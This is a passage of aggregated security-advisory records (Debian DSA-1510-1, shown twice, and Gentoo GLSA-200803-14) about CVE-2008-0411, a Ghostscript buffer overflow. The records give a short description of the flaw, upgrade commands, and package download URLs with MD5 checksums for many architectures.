7.07.1-9sarge1 of gs-esp.\r\n\r\nThe unstable distribution (sid) will be fixed soon.\r\n\r\nWe recommend that you upgrade your gs-esp and gs-gpl packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 3.1 alias sarge\r\n- --------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6.diff.gz\r\n Size/MD5 checksum: 37500 ce05f327ba06e067f8df78cb60ad386a\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1.orig.tar.gz\r\n Size/MD5 checksum: 6795608 20dfdc45c3aeb9893b75d41087f828d9\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01.orig.tar.gz\r\n Size/MD5 checksum: 5531748 b9fed961d538c0aeb841f7e46bc80857\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1.dsc\r\n Size/MD5 checksum: 830 5b84dd5a5171b74045c110eb3d21ecd2\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6.dsc\r\n Size/MD5 checksum: 729 8c80ff522cee28a37afcb68f2221be6b\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1.diff.gz\r\n Size/MD5 checksum: 56507 b02a4b36a97c61f5b81c4c0f2c9b8957\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs_8.01-6_all.deb\r\n Size/MD5 checksum: 12514 b1a11cd8a49dc3bb4afe3f2c29ff3f44\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_alpha.deb\r\n Size/MD5 checksum: 2838228 f34adbdd25489e9a6354249546996143\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_alpha.deb\r\n Size/MD5 checksum: 3189058 08aa096b5140c638ad6b200ee4f67cc7\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_amd64.deb\r\n Size/MD5 checksum: 2546568 d28291f6de6728cffe4749bc3432b5be\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_amd64.deb\r\n Size/MD5 checksum: 2868960 35d3f4801301323023e24ddac914d677\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_arm.deb\r\n Size/MD5 checksum: 2487974 22fc607e2e5fd4a573ba3cd276d81075\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_arm.deb\r\n Size/MD5 checksum: 2799614 dd67289f8031f2a775e1a2fa18cc2640\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_hppa.deb\r\n Size/MD5 checksum: 2954310 b1d0568a54276c070abd7de5999301ed\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_hppa.deb\r\n Size/MD5 checksum: 2637170 5fb35e63a13bceaa72108db451ca127a\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_i386.deb\r\n Size/MD5 checksum: 2466366 a4f4c9be11f8d84cc483863767b29e49\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_i386.deb\r\n Size/MD5 checksum: 2771496 62ce6bc97289ee62928463a47366a13d\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_ia64.deb\r\n Size/MD5 checksum: 3558624 7271e410306339eae9ee627560c41763\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_ia64.deb\r\n Size/MD5 checksum: 3124082 695f97ec95735230dc6bac436c95b100\r\n\r\nm68k architecture (Motorola Mc680x0)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_m68k.deb\r\n Size/MD5 checksum: 2298494 d0014a75fffca1e20419e11872c517b9\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_m68k.deb\r\n Size/MD5 checksum: 2588462 35f324267363f332d7f518d7f9415e8a\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_mips.deb\r\n Size/MD5 checksum: 2959398 99599bcdc1ffe9b15abd2b4b5bb22216\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_mips.deb\r\n Size/MD5 checksum: 2705408 a87e735224d614a1a822a624bf427942\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_mipsel.deb\r\n Size/MD5 checksum: 2920024 4122f5f6bcc7f9b3b215c329d0e3a53e\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_mipsel.deb\r\n Size/MD5 checksum: 2670268 53405c71a5857e128271a2cd02ae6252\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_powerpc.deb\r\n Size/MD5 checksum: 2856994 aad2af8daa3490fd8128a10035e8fe09\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_powerpc.deb\r\n Size/MD5 checksum: 2543328 df7d4be42d759105421733d75b1ad236\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_s390.deb\r\n Size/MD5 checksum: 2531042 23f6f9c8f869495ab3b8fe61590369ce\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_s390.deb\r\n Size/MD5 checksum: 2848094 383bbb72d06e8d255cf41d3e6acf53ef\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_sparc.deb\r\n Size/MD5 checksum: 2432186 25eeaa829f881209f9086f2a12896cde\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_sparc.deb\r\n Size/MD5 checksum: 2753256 97a4f8235f719f5e5644b33c388ed431\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1.orig.tar.gz\r\n Size/MD5 checksum: 7384506 002a849bf645c9346ebbcc26a1972e3f\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1.diff.gz\r\n Size/MD5 checksum: 218204 69b74a05c360f4ba85eea35ffb2c6c1c\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1.diff.gz\r\n Size/MD5 checksum: 63267 db2d2917171be033d0e3196ebd93394d\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1.orig.tar.gz\r\n Size/MD5 checksum: 11695732 05938e26bfa8769e28cf2bb38efd9673\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1.dsc\r\n Size/MD5 checksum: 852 3a9f6ff073ee09fb8313224cf219ff62\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1.dsc\r\n Size/MD5 checksum: 829 314ccac99a222bee0752ce13c26d6267\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs_8.54.dfsg.1-5etch1_all.deb\r\n Size/MD5 checksum: 14288 594611915aaeb3dfbc6a468efd51f0e5\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_alpha.deb\r\n Size/MD5 checksum: 3394724 9a42f25aed551f7ec8684f1723a2a474\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_alpha.deb\r\n Size/MD5 checksum: 5876768 b37fed1d32a051655223333b6eda6530\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_amd64.deb\r\n Size/MD5 checksum: 3139230 1cc7dfcbceffbe2a2326a2a8387b6d4b\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_amd64.deb\r\n Size/MD5 checksum: 5615964 86a0df555e923106f38a3697067a0609\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_arm.deb\r\n Size/MD5 checksum: 3026610 cba96a7f640919bbd6d5998111485289\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_arm.deb\r\n Size/MD5 checksum: 5508330 965b68910bfbae43c40979825ffef476\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_hppa.deb\r\n Size/MD5 checksum: 3227870 29af72f9b33c9cbe5b9b1b4dde017562\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_hppa.deb\r\n Size/MD5 checksum: 5724644 c12aa1ad95469fe1f7eb058822343e95\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_i386.deb\r\n Size/MD5 checksum: 5485092 c44ea2c20dc4472021f47296ab004f05\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_i386.deb\r\n Size/MD5 checksum: 3002876 f51ec0b3eb84362f54b3f6a1932fcc40\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_ia64.deb\r\n Size/MD5 checksum: 4037068 42fa033ed49b7f13d68201abe02b892f\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_ia64.deb\r\n Size/MD5 checksum: 6548054 1ca0d9dec541aafacdd36bce46ebce29\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_mips.deb\r\n Size/MD5 checksum: 3218122 2019f48ea1829cd38a099f01d17ad2b5\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_mips.deb\r\n Size/MD5 checksum: 5778866 996adb8158abbd3ddd6ded34fd463534\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_mipsel.deb\r\n Size/MD5 checksum: 5742732 2dd5262d3521df3ecbf1f1c95ff07005\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_mipsel.deb\r\n Size/MD5 checksum: 3181834 282986a71781a5ccc645d03ea14d4766\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_powerpc.deb\r\n Size/MD5 checksum: 5579416 24a6b1694d6aa66df676610cca380cf3\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_powerpc.deb\r\n Size/MD5 checksum: 3103556 291e4c92e6f933523663aed2d7e0e71e\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_s390.deb\r\n Size/MD5 checksum: 5534914 49e7a2502e303d21bed0161841af4eec\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_s390.deb\r\n Size/MD5 checksum: 3083516 91f1ae5ac05b1e17e700f59c66d778f9\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_sparc.deb\r\n Size/MD5 checksum: 5425410 fb7afa7cbfb9f9ba707aeddf5c00ff80\r\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_sparc.deb\r\n Size/MD5 checksum: 2947418 d815d67dc78463de966b8c9825c4bcf1\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niQEVAwUBR8VUvWz0hbPcukPfAQK/rwgAg2pjuJajs89vTbeN02zri+JbClkdQz5i\r\n0hrn+M9t8ifKWhEqmh3lKM7dAs85NZU6qpp3ZA009utn+fXTG16mTDsB13WQgbgW\r\nUcclYG/17U+VaPe7kOuSE2uF2s50pqhyn7yH9hwrmqJ9vUQ+mSB0Fvf57s2txNBN\r\nDNDS3SiCyfex4jFhPrRXa83KO+W3xirJ1KRiAVhkXcD9xCRNQ3RQpecS56cHguBP\r\nge8h7LPw6GhLc+kEtYkvjiaP5I3Yq7O+V1MmKkd1rD0vo9rh913ldWoXCTyhmzkP\r\nbm52k3GEC/6KgODpw9BmxINhAPZVtHBCUrsnco9eiKwZr14HDowRIA==\r\n=wAfc\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-02-27T00:00:00", "published": "2008-02-27T00:00:00", "id": "SECURITYVULNS:DOC:19291", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19291", "title": "[SECURITY] [DSA 1510-1] New ghostscript packages fix arbitrary code execution", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "cvelist": ["CVE-2008-0411"], "description": "No description provided", "edition": 1, "modified": "2008-02-27T00:00:00", "published": "2008-02-27T00:00:00", "id": "SECURITYVULNS:VULN:8726", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8726", "title": "Ghostscript buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "edition": 1, "description": "### Background\n\nGhostscript is a suite of software based on an interpreter for PostScript and PDF. \n\n### Description\n\nChris Evans (Google Security) discovered a stack-based buffer overflow within the zseticcspace() function in the file zicc.c when processing a PostScript file containing a long \"Range\" array in a .seticcscpate operator. \n\n### Impact\n\nA remote attacker could exploit this vulnerability by enticing a user to open a specially crafted PostScript file, which could possibly lead to the execution of arbitrary code or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Ghostscript ESP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/ghostscript-esp-8.15.4-r1\"\n\nAll Ghostscript GPL users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/ghostscript-gpl-8.61-r3\"\n\nAll Ghostscript GNU users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/ghostscript-gnu-8.60.0-r2\"", "modified": "2008-03-08T00:00:00", "published": "2008-03-08T00:00:00", "id": "GLSA-200803-14", "href": "https://security.gentoo.org/glsa/200803-14", "type": "gentoo", "title": "Ghostscript: Buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:27:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1510-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nFebruary 27, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : gs-esp / gs-gpl\nVulnerability : buffer overflow\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-0411\n\nChris Evans discovered a buffer overflow in the color space handling\ncode of the Ghostscript PostScript/PDF interpreter, which might result\nin the execution of arbitrary code if a user is tricked into processing\na malformed file.\n\nFor the stable distribution (etch), this problem has been fixed in version\n8.54.dfsg.1-5etch1 of gs-gpl and 8.15.3.dfsg.1-1etch1 of gs-esp.\n\nFor the old stable distribution (sarge), this problem has been fixed in\nversion 8.01-6 of gs-gpl and 7.07.1-9sarge1 of gs-esp.\n\nThe unstable distribution (sid) will be fixed soon.\n\nWe recommend that you upgrade your gs-esp and gs-gpl packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6.diff.gz\n Size/MD5 checksum: 37500 ce05f327ba06e067f8df78cb60ad386a\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1.orig.tar.gz\n Size/MD5 checksum: 6795608 20dfdc45c3aeb9893b75d41087f828d9\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01.orig.tar.gz\n Size/MD5 checksum: 5531748 b9fed961d538c0aeb841f7e46bc80857\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1.dsc\n Size/MD5 checksum: 830 5b84dd5a5171b74045c110eb3d21ecd2\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6.dsc\n Size/MD5 checksum: 729 8c80ff522cee28a37afcb68f2221be6b\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1.diff.gz\n Size/MD5 checksum: 56507 b02a4b36a97c61f5b81c4c0f2c9b8957\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs_8.01-6_all.deb\n Size/MD5 checksum: 12514 b1a11cd8a49dc3bb4afe3f2c29ff3f44\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_alpha.deb\n Size/MD5 checksum: 2838228 f34adbdd25489e9a6354249546996143\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_alpha.deb\n Size/MD5 checksum: 3189058 08aa096b5140c638ad6b200ee4f67cc7\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_amd64.deb\n Size/MD5 checksum: 2546568 d28291f6de6728cffe4749bc3432b5be\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_amd64.deb\n Size/MD5 checksum: 2868960 35d3f4801301323023e24ddac914d677\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_arm.deb\n Size/MD5 checksum: 2487974 22fc607e2e5fd4a573ba3cd276d81075\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_arm.deb\n Size/MD5 checksum: 2799614 dd67289f8031f2a775e1a2fa18cc2640\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_hppa.deb\n Size/MD5 checksum: 2954310 b1d0568a54276c070abd7de5999301ed\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_hppa.deb\n Size/MD5 checksum: 2637170 5fb35e63a13bceaa72108db451ca127a\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_i386.deb\n Size/MD5 checksum: 2466366 a4f4c9be11f8d84cc483863767b29e49\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_i386.deb\n Size/MD5 checksum: 2771496 62ce6bc97289ee62928463a47366a13d\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_ia64.deb\n Size/MD5 checksum: 3558624 7271e410306339eae9ee627560c41763\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_ia64.deb\n Size/MD5 checksum: 3124082 695f97ec95735230dc6bac436c95b100\n\nm68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_m68k.deb\n Size/MD5 checksum: 2298494 d0014a75fffca1e20419e11872c517b9\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_m68k.deb\n Size/MD5 checksum: 2588462 35f324267363f332d7f518d7f9415e8a\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_mips.deb\n Size/MD5 checksum: 2959398 99599bcdc1ffe9b15abd2b4b5bb22216\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_mips.deb\n Size/MD5 checksum: 2705408 a87e735224d614a1a822a624bf427942\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_mipsel.deb\n Size/MD5 checksum: 2920024 4122f5f6bcc7f9b3b215c329d0e3a53e\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_mipsel.deb\n Size/MD5 checksum: 2670268 53405c71a5857e128271a2cd02ae6252\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_powerpc.deb\n Size/MD5 checksum: 2856994 aad2af8daa3490fd8128a10035e8fe09\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_powerpc.deb\n Size/MD5 checksum: 2543328 df7d4be42d759105421733d75b1ad236\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_s390.deb\n Size/MD5 checksum: 2531042 23f6f9c8f869495ab3b8fe61590369ce\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_s390.deb\n Size/MD5 checksum: 2848094 383bbb72d06e8d255cf41d3e6acf53ef\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.01-6_sparc.deb\n Size/MD5 checksum: 2432186 25eeaa829f881209f9086f2a12896cde\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_7.07.1-9sarge1_sparc.deb\n Size/MD5 checksum: 2753256 97a4f8235f719f5e5644b33c388ed431\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 7384506 002a849bf645c9346ebbcc26a1972e3f\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1.diff.gz\n Size/MD5 checksum: 218204 69b74a05c360f4ba85eea35ffb2c6c1c\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1.diff.gz\n Size/MD5 checksum: 63267 db2d2917171be033d0e3196ebd93394d\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 11695732 05938e26bfa8769e28cf2bb38efd9673\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1.dsc\n Size/MD5 checksum: 852 3a9f6ff073ee09fb8313224cf219ff62\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1.dsc\n Size/MD5 checksum: 829 314ccac99a222bee0752ce13c26d6267\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs_8.54.dfsg.1-5etch1_all.deb\n Size/MD5 checksum: 14288 594611915aaeb3dfbc6a468efd51f0e5\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_alpha.deb\n Size/MD5 checksum: 3394724 9a42f25aed551f7ec8684f1723a2a474\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_alpha.deb\n Size/MD5 checksum: 5876768 b37fed1d32a051655223333b6eda6530\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_amd64.deb\n Size/MD5 checksum: 3139230 1cc7dfcbceffbe2a2326a2a8387b6d4b\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_amd64.deb\n Size/MD5 checksum: 5615964 86a0df555e923106f38a3697067a0609\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_arm.deb\n Size/MD5 checksum: 3026610 cba96a7f640919bbd6d5998111485289\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_arm.deb\n Size/MD5 checksum: 5508330 965b68910bfbae43c40979825ffef476\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_hppa.deb\n Size/MD5 checksum: 3227870 29af72f9b33c9cbe5b9b1b4dde017562\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_hppa.deb\n Size/MD5 checksum: 5724644 c12aa1ad95469fe1f7eb058822343e95\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_i386.deb\n Size/MD5 checksum: 5485092 c44ea2c20dc4472021f47296ab004f05\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_i386.deb\n Size/MD5 checksum: 3002876 f51ec0b3eb84362f54b3f6a1932fcc40\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_ia64.deb\n Size/MD5 checksum: 4037068 42fa033ed49b7f13d68201abe02b892f\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_ia64.deb\n Size/MD5 checksum: 6548054 1ca0d9dec541aafacdd36bce46ebce29\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_mips.deb\n Size/MD5 checksum: 3218122 2019f48ea1829cd38a099f01d17ad2b5\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_mips.deb\n Size/MD5 checksum: 5778866 996adb8158abbd3ddd6ded34fd463534\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_mipsel.deb\n Size/MD5 checksum: 5742732 2dd5262d3521df3ecbf1f1c95ff07005\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_mipsel.deb\n Size/MD5 checksum: 3181834 282986a71781a5ccc645d03ea14d4766\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/gs-gpl/gs-gpl_8.54.dfsg.1-5etch1_powerpc.deb\n Size/MD5 checksum: 5579416 24a6b1694d6aa66df676610cca380cf3\n http://security.debian.org/pool/updates/main/g/gs-esp/gs-esp_8.15.3.dfsg.1-1etch1_powerpc.deb\n Size/MD5 checksum: 3103556 291e4c92e6f933523663aed2d7e0e71e\n\ns390 architecture (IBM S/390)\n\n 